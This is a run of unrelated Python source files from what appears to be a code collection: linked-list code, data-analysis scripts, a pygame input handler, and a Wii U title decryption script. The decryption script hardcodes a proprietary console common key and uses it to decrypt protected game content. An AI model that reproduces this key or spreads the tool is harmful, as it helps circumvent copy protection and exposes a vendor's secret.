:return:\n        '''\n\n        dummy = Node(None)\n        dummy.next_node = self._head\n\n        first = dummy\n        second = dummy\n\n        for _ in range(n):\n            first = first.next_node\n\n        while first.next_node:\n            first = first.next_node\n            second = second.next_node\n\n        second.next_node = second.next_node.next_node\n        self._head = dummy.next_node\n        #\n        # if n <= 0:\n        #     print('n must be greater than 0')\n        #     return\n        #\n        # if self._head is None:\n        #     print('Empty list. Nothing to do')\n        #     return\n        #\n        # first = self._head\n        # second = self._head\n        #\n        # for _ in range(n):\n        #     first = first.next_node\n        #\n        # if first is None:  # the node to delete is the first node: just point head at its successor\n        #     self._head = self._head.next_node\n        #     return\n        #\n        # while first.next_node:\n        #     first = first.next_node\n        #     second = second.next_node\n        #\n        # # now first points at the last node; for a list of length m, first is at the predecessor of node m,\n        # # and second is at the predecessor of node m-n, i.e. the predecessor of the n-th node from the end\n        # # so deleting that node only requires pointing second's next at the node after next\n        #\n        # second.next_node = second.next_node.next_node\n        # return\n\n    def find_mid_node(self):\n        '''\n        Find the middle node of the list.\n        The fast pointer moves two steps per iteration and the slow pointer one step, so when the\n        fast pointer reaches the tail the slow pointer is at the middle of the list\n        :return: the middle node for an odd-length list, or the first node of the second half for an even length\n        '''\n        fast = self._head\n        slow = self._head\n\n        while fast is not None and fast.next_node is not None:\n            fast = fast.next_node.next_node\n            slow = slow.next_node\n\n        return slow\n\n    def find_by_value(self, value: int):\n        '''\n        Find the first node with the given value\n        :param value:\n        :return:\n        '''\n        p = self._head\n        while p and p.data != value:\n            p = 
p.next_node\n        return p\n\n    def find_by_index(self, index: int):\n        '''\n        Find the node at the given index\n        :param index:\n        :return:\n        '''\n        p = self._head\n        pos = 0\n        while p and pos != index:\n            p = p.next_node\n            pos += 1\n        return p\n\n    def print_all(self):\n        '''\n        Print the data of every node in the list\n        :return:\n        '''\n\n        pos = self._head\n        if pos is None:\n            print('The linked list is empty')\n            return\n        while pos.next_node:\n            print(f'{pos.data}-->', end=\"\")\n            pos = pos.next_node\n        print(pos.data)\n\n    def have_ring(self):\n        '''\n        Check whether the list contains a cycle\n        The fast pointer moves two steps per iteration and the slow pointer one step; if the fast\n        pointer reaches the tail without meeting the slow pointer there is no cycle, otherwise there is one\n        :return:\n        '''\n        fast = self._head\n        slow = self._head\n\n        while (fast is not None) and (fast.next_node is not None):  # an empty list or a single node cannot form a cycle\n            fast = fast.next_node.next_node\n            slow = slow.next_node\n            if fast == slow:\n                return True\n        return False\n\n    def reverse(self):\n        \"\"\"Reverse the singly linked list.\"\"\"\n        if self._head is None or self._head.next_node is None:  # empty list or a single node: nothing to do\n            return\n\n        pre = self._head\n        node = self._head.next_node\n        while node is not None:  # when the loop ends, pre is the last non-None node\n            pre, node = self.__reversed_with_two_node(pre, node)\n\n        self._head.next_node = None  # the old head is now the tail, so point it at None\n        self._head = pre  # pre is the head of the reversed list\n\n    @property\n    def head_node(self):\n        return self._head\n\n    def __reversed_with_two_node(self, pre, node):\n        '''\n        Reverse one pair of adjacent links\n        :param pre: the previous node\n        :param node: the current node\n        :return: a (pre, node) tuple advanced to the next adjacent pair\n        '''\n        tmp = node.next_node\n        node.next_node = pre\n        pre = node\n        node = tmp\n        return pre, node\n\n    @staticmethod\n    def merge_sorted_list(l1: Node, l2: Node):\n        '''\n        Merge two sorted linked lists\n        :param l1: head node of the first sorted list\n        :param l2: head node of the second sorted list\n        :return:\n        '''\n        p1, p2 = l1, l2\n        dummy = Node(None)\n        current = dummy\n        while p1 and p2:\n            if p1.data <= p2.data:\n                current.next_node = p1\n                p1 = p1.next_node\n            else:\n                current.next_node = p2\n                p2 = p2.next_node\n            current = current.next_node\n        current.next_node = p1 if p1 else p2\n        return dummy.next_node\n\n\nif __name__ == \"__main__\":\n    l1 = SingleLinkedList()\n    l1.insert_to_head(4)\n    l1.insert_to_head(2)\n    l1.insert_to_head(1)\n\n    l1.print_all()\n    node2 = l1.find_by_index(1)\n    l1.insert_node_before(node2, 3)\n    l1.print_all()\n\n    l2 = SingleLinkedList()\n    l2.insert_to_head(4)\n    l2.insert_to_head(3)\n    l2.insert_to_head(1)\n\n    l2.print_all()\n\n    l3_head = SingleLinkedList.merge_sorted_list(l1.head_node, l2.head_node)\n    current = l3_head\n    node_data_list = []\n    while current:\n        node_data_list.append(str(current.data))\n        current = current.next_node\n    print('-->'.join(node_data_list))\n\n    l4 = SingleLinkedList()\n    for i in range(4):\n        l4.insert_to_head(i)\n\n    l4.print_all()\n    print(l4.have_ring())\n    node3 = l4.find_by_index(0)\n    node0 = l4.find_by_value(0)\n    node0.next_node = node3  # create a cycle\n    print(l4.have_ring())\n","sub_path":"python/02_linkedlist/single_linked_list.py","file_name":"single_linked_list.py","file_ext":"py","file_size_in_byte":10238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"334138952","text":"\"\"\"Determine the fraction of non-built-up land area needed to become autarkic.\"\"\"\nimport click\nimport pandas as pd\n\nfrom src.potentials import Potential\n\n\n@click.command()\n@click.argument(\"path_to_demand\")\n@click.argument(\"path_to_potential\")\n@click.argument(\"path_to_footprint\")\n@click.argument(\"path_to_built_up_area\")\n@click.argument(\"path_to_output\")\n@click.argument(\"share_from_pv\", type=click.INT)\ndef necessary_land(path_to_demand, path_to_potential, path_to_footprint, path_to_built_up_area,\n                   path_to_output, 
share_from_pv=100):\n \"\"\"Determine the fraction of non-built-up land area needed to become autarkic.\n\n Can vary the share of demand satisfied by rooftop PV.\n\n Ignores offshore as it distorts total area sizes.\n \"\"\"\n assert share_from_pv <= 100\n assert share_from_pv >= 0\n share_from_pv = share_from_pv / 100\n demand = pd.read_csv(path_to_demand, index_col=0)[\"demand_twh_per_year\"]\n potentials = pd.read_csv(path_to_potential, index_col=0)\n footprint = pd.read_csv(path_to_footprint, index_col=0)\n built_up_area = pd.read_csv(path_to_built_up_area, index_col=0)\n\n rooftop_pv = potentials[str(Potential.ROOFTOP_PV)].where(\n potentials[str(Potential.ROOFTOP_PV)] < share_from_pv * demand,\n share_from_pv * demand\n )\n demand_after_rooftops = demand - rooftop_pv\n assert (demand_after_rooftops >= 0).all()\n\n open_field_potential = potentials[str(Potential.ONSHORE_WIND)] + potentials[str(Potential.OPEN_FIELD_PV)]\n share_of_open_field_potential_necessary = demand_after_rooftops / open_field_potential\n open_field_footprint = footprint[Potential.ONSHORE_WIND.area_name] + footprint[Potential.OPEN_FIELD_PV.area_name]\n\n necessary_land = open_field_footprint * share_of_open_field_potential_necessary\n fraction_non_built_up_land = necessary_land / built_up_area[\"non_built_up_km2\"]\n # corner cases\n fraction_non_built_up_land[fraction_non_built_up_land > 1] = 1\n\n pd.DataFrame(\n index=fraction_non_built_up_land.index,\n data={\n \"fraction_non_built_up_land_necessary\": fraction_non_built_up_land,\n \"fraction_roofs_necessary\": rooftop_pv / potentials[str(Potential.ROOFTOP_PV)],\n \"rooftop_pv_generation_twh_per_year\": rooftop_pv\n }\n ).to_csv(\n path_to_output,\n index=True,\n header=True\n )\n\n\nif __name__ == \"__main__\":\n necessary_land()\n","sub_path":"src/necessary_land.py","file_name":"necessary_land.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"30780169","text":"#!/usr/bin/env python3\n\n# encrypted titlekey is decrypted with the Wii U Common Key\n# with IV being TID + 0x00 padding\n\n# contents are decrypted with the decrypted titlekey\n# with IV being all 0x00, or index bytes + 0x00 padding\n\nimport binascii\nimport glob\nimport itertools\nimport math\nimport os\nimport struct\nimport sys\nfrom Crypto.Cipher import AES\ntry:\n from Crypto.Hash import SHA1\nexcept ImportError:\n from Crypto.Hash import SHA\n SHA1 = SHA\n\n# put the common key here to decrypt things\nwiiu_common_key = \"D7B00402659BA2ABD2CB0DB27FA2B656\"\n\n##########################\n\nwiiu_common_key_hash = SHA1.new(wiiu_common_key.encode('utf-8').upper())\nif wiiu_common_key_hash.hexdigest() != 'e3fbc19d1306f6243afe852ab35ed9e1e4777d3a':\n sys.exit(\"Wrong Wii U Common Key. 
Place the correct one in the script.\")\n\nckey = binascii.unhexlify(wiiu_common_key)\n\nreadsize = 8 * 1024 * 1024\n\nif not os.path.isfile(\"title.tmd\"):\n sys.exit(\"No TMD (title.tmd) was found.\")\n\n\ndef show_progress(val, maxval):\n # crappy workaround I bet, but print() didn't do what I wanted\n minval = min(val, maxval)\n sys.stdout.write(\"\\r- {:>5.1f}% {:>10} / {}\".format((minval / maxval) * 100, minval, maxval))\n sys.stdout.flush()\n\n\ndef show_chunk(num, count):\n # crappy workaround I bet, but print() didn't do what I wanted\n sys.stdout.write(\"\\r- Chunk {:>5} / {:>5}\".format(num + 1, count))\n sys.stdout.flush()\n\n# find title id and content id\ntitle_id = b\"\"\ncontents = []\ncontent_count = 0\nwith open(glob.glob(\"title.tmd*\")[0], \"rb\") as tmd:\n tmd.seek(0x18C)\n title_id = tmd.read(0x8)\n tmd.seek(0x1DE)\n content_count = struct.unpack(\">H\", tmd.read(0x2))[0]\n tmd.seek(0x204)\n tmd_index = tmd.read(0x2)[::-1]\n for c in range(content_count):\n tmd.seek(0xB04 + (0x30 * c))\n content_id = binascii.hexlify(tmd.read(0x4)).decode('utf-8')\n tmd.seek(0xB08 + (0x30 * c))\n content_index = tmd.read(0x2)\n tmd.seek(0xB0A + (0x30 * c))\n content_type = struct.unpack(\">H\", tmd.read(0x2))[0]\n tmd.seek(0xB0C + (0x30 * c))\n content_size = struct.unpack(\">Q\", tmd.read(0x8))[0]\n # content_size = os.path.getsize(content_id)\n tmd.seek(0xB14 + (0x30 * c))\n content_hash = tmd.read(0x14)\n contents.append([content_id, content_index, content_type, content_size, content_hash])\n\nprint(\"Title ID: \" + binascii.hexlify(title_id).decode('utf-8').upper())\n\n# find encrypted titlekey\nencrypted_titlekey = b\"\"\nif os.path.isfile(\"title.tik\"):\n with open(\"title.tik\", \"rb\") as cetk:\n cetk.seek(0x1BF)\n encrypted_titlekey = cetk.read(0x10)\nelif len(sys.argv) > 1:\n encrypted_titlekey = binascii.unhexlify(sys.argv[1])\nelse:\n sys.exit(\"Missing CETK (title.tik). 
Please add an argument containing the encrypted titlekey.\")\n\nprint(\"Encrypted Titlekey: \" + binascii.hexlify(encrypted_titlekey).decode('utf-8').upper())\n\n# decryption fun\ncipher_titlekey = AES.new(ckey, AES.MODE_CBC, title_id + (b\"\\0\" * 8))\ndecrypted_titlekey = cipher_titlekey.decrypt(encrypted_titlekey)\nprint(\"Decrypted Titlekey: \" + binascii.hexlify(decrypted_titlekey).decode('utf-8').upper())\n\nfor c in contents:\n    print(\"Decrypting {}...\".format(c[0]))\n    left = os.path.getsize(c[0] + \".app\")  # set to file size\n    left_hash = c[3]  # set to tmd size (can differ to filesize)\n\n    if c[2] & 0x2:  # if has a hash tree\n        chunk_count = left // 0x10000\n        chunk_num = 0\n        with open(c[0] + \".h3\", \"rb\") as h3:\n            h3_hashes = h3.read()\n        if SHA1.new(h3_hashes).digest() == c[4]:\n            print(\"H3 Hash valid\")\n        else:\n            print(\"H3 Hash mismatch!\")\n            print(\" > TMD: \" + binascii.hexlify(c[4]).decode('utf-8').upper())\n            print(\" > Result: \" + SHA1.new(h3_hashes).hexdigest().upper())\n        print(\"Chunks: {}\".format(chunk_count))\n        h0_hash_num = 0\n        h1_hash_num = 0\n        h2_hash_num = 0\n        h3_hash_num = 0\n        with open(c[0] + \".app\", \"rb\") as encrypted:\n            with open(c[0] + \".app.dec\", \"wb\") as decrypted:\n                for chunk_num in range(chunk_count):\n                    show_chunk(chunk_num, chunk_count)\n                    # decrypt and verify hash tree\n                    cipher_hash_tree = AES.new(decrypted_titlekey, AES.MODE_CBC, (b\"\\0\" * 16))\n                    hash_tree = cipher_hash_tree.decrypt(encrypted.read(0x400))\n                    h0_hashes = hash_tree[0:0x140]\n                    h1_hashes = hash_tree[0x140:0x280]\n                    h2_hashes = hash_tree[0x280:0x3c0]\n                    h0_hash = h0_hashes[(h0_hash_num * 0x14):((h0_hash_num + 1) * 0x14)]\n                    h1_hash = h1_hashes[(h1_hash_num * 0x14):((h1_hash_num + 1) * 0x14)]\n                    h2_hash = h2_hashes[(h2_hash_num * 0x14):((h2_hash_num + 1) * 0x14)]\n                    h3_hash = h3_hashes[(h3_hash_num * 0x14):((h3_hash_num + 1) * 0x14)]\n                    if SHA1.new(h0_hashes).digest() != h1_hash:\n                        print(\"\\rH0 Hashes invalid in chunk {}\".format(chunk_num))\n                    if SHA1.new(h1_hashes).digest() != h2_hash:\n                        print(\"\\rH1 Hashes invalid in chunk {}\".format(chunk_num))\n                    if SHA1.new(h2_hashes).digest() != h3_hash:\n                        print(\"\\rH2 Hashes invalid in chunk {}\".format(chunk_num))\n                    # doesn't feel right, but only way for a long number I know of\n                    iv = int.from_bytes(h0_hash, byteorder='big') // 0x100000000\n                    #print(\"{:0>32X}\".format(iv))\n                    cipher_content = AES.new(decrypted_titlekey, AES.MODE_CBC, binascii.unhexlify(\"{:0>32X}\".format(iv)))\n                    decrypted_data = cipher_content.decrypt(encrypted.read(0xFC00))\n                    if SHA1.new(decrypted_data).digest() != h0_hash:\n                        print(\"\\rData block hash invalid in chunk {}\".format(chunk_num))\n                    decrypted.write(hash_tree + decrypted_data)\n                    h0_hash_num += 1\n                    if h0_hash_num >= 16:\n                        h0_hash_num = 0\n                        h1_hash_num += 1\n                    if h1_hash_num >= 16:\n                        h1_hash_num = 0\n                        h2_hash_num += 1\n                    if h2_hash_num >= 16:\n                        h2_hash_num = 0\n                        h3_hash_num += 1\n        print(\"\")\n    else:\n        cipher_content = AES.new(decrypted_titlekey, AES.MODE_CBC, c[1] + (b\"\\0\" * 14))\n        content_hash = SHA1.new()\n        with open(c[0] + \".app\", \"rb\") as encrypted:\n            with open(c[0] + \".app.dec\", \"wb\") as decrypted:\n                for __ in range(int(math.floor((c[3] / readsize)) + 1)):\n                    to_read = min(readsize, left)\n                    to_read_hash = min(readsize, left_hash)\n                    encrypted_content = encrypted.read(to_read)\n                    decrypted_content = cipher_content.decrypt(encrypted_content)\n                    content_hash.update(decrypted_content[0:to_read_hash])\n                    decrypted.write(decrypted_content)\n                    left -= readsize\n                    left_hash -= readsize\n                    show_progress(c[3] - left, c[3])\n                    
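# left_hash mirrors the size declared in the TMD, which can be smaller than the\n                    # file on disk, so clamp it at zero to keep the final SHA1 update length valid\n                    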
if left_hash < 0:\n left_hash = 0\n if left <= 0:\n print(\"\")\n break\n if c[4] == content_hash.digest():\n print(\"Content Hash valid\")\n else:\n print(\"Content Hash mismatch!\")\n print(\" > TMD: \" + binascii.hexlify(c[4]).decode('utf-8').upper())\n print(\" > Result: \" + content_hash.hexdigest().upper())\n","sub_path":"wiiu_decrypt.py","file_name":"wiiu_decrypt.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"463977873","text":"\r\nimport json\r\nimport sys\r\nimport os\r\nimport argparse\r\n\r\nimport os.path\r\n\r\n\r\n\r\n\r\n\r\ndef parseArguments():\r\n\r\n try:\r\n \r\n parser = argparse.ArgumentParser(description='Parses report refresh history and returns ok if last refresh successfull') \r\n parser.add_argument(\"-d\",\"--dataSetId\", help=\"Enter dataset id of a report\", required=True)\r\n \r\n args = parser.parse_args()\r\n \r\n if len(sys.argv) < 2:\r\n parser.print_help()\r\n parser.exit(1)\r\n\r\n return args\r\n \r\n except:\r\n\r\n #print('Problem @parseArguments')\r\n #print(sys.exc_info())\r\n sys.exit(1)\r\n\r\n \r\njson_file_path = \"D:\\\\Reporting\\\\OutputFiles\\\\PBIRefresh\\\\afa54983-da95-4e05-96db-9a7e664c6310\"\r\n#json_file_path = \"D:\\\\Reporting\\\\OutputFiles\\\\PBIRefresh\\\\\"\r\nlastId_file_path = \"D:\\\\Reporting\\\\OutputFiles\\\\PBIRefresh\"\r\n\r\nwith open(json_file_path,encoding='utf-16', errors='ignore') as histFile:\r\n myDict = json.loads(histFile.read())\r\n #myDict = json.load(histFile, strict=False)\r\n\r\n\r\n'''\r\n 1. read in lastId file & compare with latest json id\r\n if latest json id is greater than lastId -> check if status completed\r\n if true then report \"refresh successfull\"\r\n 2. 
save latest json id into lastId file & quit\r\n\r\n if lastId file not exists then check \r\n \r\n'''\r\n\r\n#print(myDict)\r\n'''\r\nprint(\"\")\r\nprint(myDict['value'])\r\nprint(\"\")\r\n'''\r\nprint(myDict['value'][0])\r\nprint(\"\")\r\nprint(myDict['value'][0]['id'])\r\n\r\nif myDict['value'][0]['status'] == \"Completed\" and myDict['value'][0]['refreshType'] == 'ViaApi':\r\n print(\"all ok\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n myargs = parseArguments()\r\n print(myargs.dataSetId)\r\n\r\n #os.path.isfile(fname) \r\n\r\n","sub_path":"PBIRefreshHistParser/backup/pbiRefreshHistParser - Copy (2).py","file_name":"pbiRefreshHistParser - Copy (2).py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"238915842","text":"#-------------------------------------------------------------------------------\n# Name: module1\n# Purpose:\n#\n# Author: mwoods\n#\n# Created: 28/10/2013\n# Copyright: (c) mwoods 2013\n# Licence: \n#-------------------------------------------------------------------------------\n\n\nimport GeoHandler as geo\nimport numpy as np\nimport json\nimport util\n\n\n\n\nclass BuildCustomerNet:\n def __init__(self, acct):\n self.acct = acct\n self.customer_data = self._get_customer_data()\n self.fsl_meta = self._get_fsl_meta()\n\n def _get_customer_data(self):\n val = util.get_customer_net()\n return val.get(self.acct, None)\n\n def _get_fsl_meta(self):\n fsl_meta = util.get_fsl_meta_data_from_memory()\n if self.customer_data != None:\n return {k: fsl_meta[k] for k in self.customer_data['fsl_list']}\n\n def get_fsl_summary(self):\n summary_data = self.customer_data['summary']\n temp = {}\n for fsl, item in summary_data:\n temp.setdefault(fsl, {'geopt':set([]),\n 'cont_amt':0,\n 'cont_qty':0})\n temp[fsl]['geopt'].update(summary_data[(fsl, item)]['geopt'])\n temp[fsl]['cont_amt'] += summary_data[(fsl, item)]['cont_amt']\n temp[fsl]['cont_qty'] += summary_data[(fsl, item)]['cont_qty']\n return temp\n\n def get_plot(self):\n\n if self.customer_data == None:\n return json.dumps([]), json.dumps([])\n\n customer_locations = []\n fsl_locations = []\n summary_data = self.get_fsl_summary()\n\n for fsl in summary_data:\n c = util.assign_color()\n #c = \"green\"\n fsl_dict = self.fsl_meta[fsl]\n geopt = fsl_dict['geopt']\n if geopt != None:\n lat,lng = geo.latLngStringToFloat(geopt)\n fsl_locations.append([fsl, lat, lng, c])\n\n for geopt in summary_data[fsl]['geopt']:\n #c = \"red\"\n geopt_float = geo.latLngStringToFloat(geopt)\n if geopt_float != None:\n lat,lng = geopt_float\n customer_locations.append([self.customer_data['customer_name'], lat, lng, c])\n\n if customer_locations != []:\n customer_locations = np.array(customer_locations)\n customer_locations[:,1] = util.jitter_array(customer_locations[:,1])\n customer_locations[:,2] = util.jitter_array(customer_locations[:,2])\n customer_locations = customer_locations.tolist()\n return json.dumps(fsl_locations), json.dumps(customer_locations)\n\n def get_fsl_summary_table(self):\n if self.customer_data == None:\n return []\n\n\n summary = self.get_fsl_summary()\n\n out = []\n\n for fsl in self.customer_data['fsl_list']:\n out.append(['{0}'.format(fsl), self.fsl_meta[fsl]['country_code'], summary[fsl]['cont_amt'], len(summary[fsl]['geopt'])])\n out = np.array(out).astype('object')\n out = out[np.argsort(out[:,2].astype('f8'))[::-1]]\n\n header = ['FSL', 'Country', 'Cont Amt', 'Unique Locs']\n out = 
util.convert_array_to_html_table(out, header)\n return out\n\n def get_item_table(self):\n if self.customer_data == None:\n return []\n\n summary_dict = self.customer_data['summary']\n\n out = np.array([[fsl, item,\n summary_dict[(fsl, item)]['cont_amt'],\n summary_dict[(fsl, item)]['cont_qty']] for fsl,item in summary_dict])\n\n header = ['FSL', 'Item', 'Cont Amt', 'Cont Qty']\n total = ['Grand Total', '', np.sum(out[:,2].astype('f8')), np.sum(out[:,3].astype('f8'))]\n return util.convert_array_to_html_table(out, header, total)\n\n def summary(self):\n summary_data = {'cont_amt':0, 'customer_name':'', 'fsl_ct':0, 'cust_sites':0}\n\n if self.customer_data != None:\n summary_data['cont_amt'] = self.customer_data['cont_amt']\n summary_data['customer_name'] = self.customer_data['customer_name']\n summary_data['fsl_ct'] = len(self.customer_data['fsl_list'])\n summary_data['cust_sites'] = len(self.customer_data['geopt'])\n return summary_data\n\n\n\nif __name__==\"__main__\":\n from FileIO import Data_Connections\n\n #D = get_data_from_mem()\n #D.run_default2(dev = True)\n\n t = 'BELKCORP'\n\n cn = BuildCustomerNet(t)\n cn.summary()\n cn.get_plot()\n cn.get_item_table()\n cn.get_fsl_summary_table()\n\n","sub_path":"prism/CustomerDataModel.py","file_name":"CustomerDataModel.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"184765208","text":"import pygame, random, sys\nfrom pygame.locals import *\n\nclass Commands:\n\n def __init__(self):\n self.move = {\n 'left': False,\n 'right': False,\n 'up': False,\n 'down': False,\n }\n\n def terminate(self):\n pygame.quit()\n sys.exit()\n\n def waitForPlayerToPressKey(self):\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE: # pressing escape quits\n terminate()\n return\n\n def controls(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n\n if event.type == KEYDOWN:\n if event.key == ord('z'):\n reverseCheat = True\n if event.key == ord('x'):\n slowCheat = True\n if event.key == K_LEFT or event.key == ord('a'):\n self.move[\"right\"] = False\n self.move[\"left\"] = True\n if event.key == K_RIGHT or event.key == ord('d'):\n self.move[\"left\"] = False\n self.move[\"right\"] = True\n if event.key == K_UP or event.key == ord('w'):\n self.move[\"down\"] = False\n self.move[\"up\"] = True\n if event.key == K_DOWN or event.key == ord('s'):\n self.move[\"up\"] = False\n self.move[\"down\"] = True\n\n if event.type == KEYUP:\n if event.key == ord('z'):\n reverseCheat = False\n score = 0\n if event.key == ord('x'):\n slowCheat = False\n score = 0\n if event.key == K_ESCAPE:\n terminate()\n\n if event.key == K_LEFT or event.key == ord('a'):\n self.move[\"left\"] = False\n if event.key == K_RIGHT or event.key == ord('d'):\n self.move[\"right\"] = False\n if event.key == K_UP or event.key == ord('w'):\n self.move[\"up\"] = False\n if event.key == K_DOWN or event.key == ord('s'):\n self.move[\"down\"] = False\n\n\n if event.type == MOUSEMOTION:\n playerRect.move_ip(event.pos[0] - playerRect.centerx, event.pos[1] - playerRect.centery)\n","sub_path":"learn/pyGame/dodger/myOne/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"624762108","text":"import numpy as np\nimport pandas as pd\nimport warnings\nfrom 
sklearn.ensemble import RandomForestRegressor\n#from xgboost import XGBRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.metrics import r2_score\nimport pickle\nwarnings.filterwarnings('ignore')\n\ndf = pd.read_csv(r'C:\\Users\\chandu\\Documents\\Board Infinity\\Machine Learning\\Projects\\Capstone Project-2 (Old car price prediction)\\car-data.csv')\n\ndf= df.drop_duplicates()\n\ndf['year'] = 2021 - df['year']\n\ndf.rename(columns = {'year':'age_of_car'}, inplace = True)\n\ndf = df.replace({'Automatic': 0, 'Manual': 1, 'Semi-Auto': 2})\n\ndf = df.replace({'Diesel': 0, 'Petrol': 1, 'Hybrid': 2, 'Other': 3})\n\nx = df[df.engineSize == 0].index\ndf = df.drop(labels=x, axis =0)\n\nX = df[['age_of_car','transmission','mileage','fuelType','tax','mpg','engineSize']]\ny = df['price']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state = 42)\n\n\n# ## RandomForestRegressor\n\nreg_rf = RandomForestRegressor()\nreg_rf.fit(X_train, y_train)\ny_pred = reg_rf.predict(X_test)\n\nprint('MAE:', metrics.mean_absolute_error(y_test, y_pred))\nprint('MSE:', metrics.mean_squared_error(y_test, y_pred))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_pred)))\n\nr2_score(y_test,y_pred)\n\nr2 = (r2_score(y_test, y_pred))\nn = X_test.shape[0] # Number of rows in out test data\np = X_test.shape[1] # Number of features in our data\nadj_r2 = 1 - (((1-r2)*(n-1))/(n-p-1))\nprint(\"Adjusted R2 Error:\", adj_r2)\n\n# ## XGBRegressor\n\n# XGB = XGBRegressor()\n# XGB.fit(X_train, y_train)\n# y_pred = XGB.predict(X_test)\n\n# print('MAE:', metrics.mean_absolute_error(y_test, y_pred))\n# print('MSE:', metrics.mean_squared_error(y_test, y_pred))\n# print('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_pred)))\n\n# r2 = (r2_score(y_test, y_pred))\n# n = X_test.shape[0] # Number of rows in out test data\n# p = X_test.shape[1] # Number of features in our data\n# adj_r2 = 1 - (((1-r2)*(n-1))/(n-p-1))\n# print(\"Adjusted R2 Error:\", adj_r2)\n\nf = open('reg_rf.pickle', 'wb')\npickle.dump(reg_rf, f)\nf.close()\n\n\n# f = open('XGB.pickle', 'wb')\n# pickle.dump(reg_rf, f)\n# f.close()","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"197563651","text":"#! 
/usr/bin/python\n\nimport os\nimport numpy as np\nimport calcos\nfrom astropy.io import fits\nfrom costools import x1dcorr\nimport glob\nfrom matplotlib import pyplot as plt\nplt.style.use(['seaborn-muted'])\nfrom stsci.convolve import boxcar\nfrom functools import partial\nimport multiprocessing as mp\nimport argparse\n#%config Inline.Backend.figure_format='retina'\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nrootdir = '/user/esnyder/newnuvproj/'\ngroupdir = '/grp/hst/cos2/nuvboxheight/'\nsubdirlist = ['cycle23', 'cycle18', 'cycle19', 'cycle20', 'cycle21', 'cycle22', 'cycle17', 'faint_11667', 'faint_13846', 'smov4bright', 'faint_13398', 'faint_14265']\nbinninglist = ['7', '13', '17', '23', '27', '33', '37', '43', '47', '53', '57']\n\n\nfor folder in subdirlist:\n filebases = glob.glob(os.path.join(groupdir, folder, '7', '*_flt.fits'))\n for filebase in filebases:\n filename = filebase.split('/')[-1]\n filestoplot = glob.glob(os.path.join(groupdir, folder, '*', filename))\n refspecfiles = glob.glob(os.path.join(groupdir, folder, '*', filename.split('_')[0] + '_x1d.fits'))\n if refspecfiles == []: continue\n if os.path.isfile(os.path.join(groupdir, folder, filename.split('.')[0] + '_fltimageplot.pdf')):\n os.system('rm ' + os.path.join(groupdir, folder, filename.split('.')[0] + '_fltimageplot.pdf'))\n with PdfPages(os.path.join(groupdir, folder, filename.split('.')[0] + '_fltimageplot.pdf')) as pdf:\n \n for plottingfile,refspecfile in zip(filestoplot,refspecfiles):\n \n num = plottingfile.split('/')[-2]\n \n # pull out header keywords #\n \n obj = fits.getval(refspecfile, 'targname', ext=0)\n opt_elem = fits.getval(refspecfile, 'opt_elem', ext=0)\n cenwave = fits.getval(refspecfile, 'cenwave', ext=0)\n aper = fits.getval(refspecfile, 'aperture', ext=0)\n slopeA = fits.getval(refspecfile, 'SP_SLP_A', ext=1)\n slopeB = fits.getval(refspecfile, 'SP_SLP_B', ext=1)\n slopeC = fits.getval(refspecfile, 'SP_SLP_C', ext=1)\n asn = fits.getval(refspecfile, 'ASN_ID', ext=0)\n \n # open xtractab file #\n \n tab = fits.open('/user/esnyder/bewnuvproj/newx1dfiles/w5g1439sl_' + num + '.fits')\n tabdata = tab[1].data\n stripeind = np.where((tabdata['OPT_ELEM'] == opt_elem) & (tabdata['CENWAVE'] == cenwave) & (tabdata['APERTURE'] == aper))\n\n # open the left side plot # \n \n fig = plt.figure(figsize=(15,8))\n axl = fig.add_axes([0.08,0.08,0.6,0.85])\n \n # open the flat image and plot it #\n \n spec = fits.open(plottingfile)\n axl.imshow(spec[1].data, cmap = plt.get_cmap('gist_yarg'), aspect = 'auto')\n\n # get box info and add to left side plot #\n \n a_center = tabdata[stripeind[0][0]]['B_SPEC']\n b_center = tabdata[stripeind[0][1]]['B_SPEC']\n c_center = tabdata[stripeind[0][2]]['B_SPEC']\n\n a_height, b_height, c_height = float(num), float(num), float(num)\n\n x_pixels = np.arange(1500)\n y_pixels = np.zeros(1500)\n\n #slope = (415.27 - 420.7) / (1149.1 - 126.3)\n aveAtop = np.mean((x_pixels * slopeA) + (a_center + a_height/2.))\n aveAbot = np.mean((x_pixels * slopeA) + (a_center - a_height/2.))\n aveBtop = np.mean((x_pixels * slopeB) + (b_center + b_height/2.))\n aveBbot = np.mean((x_pixels * slopeB) + (b_center - b_height/2.))\n aveCtop = np.mean((x_pixels * slopeC) + (c_center + c_height/2.))\n aveCbot = np.mean((x_pixels * slopeC) + (c_center - c_height/2.))\n \n boundsA57 = [int(a_center - 57./2.), int(a_center + 57./2.)]\n boundsB57 = [int(b_center - 57./2.), int(b_center + 57./2.)]\n boundsC57 = [int(c_center - 57./2.), int(c_center + 57./2.)]\n \n boundsA = [int(a_center - 
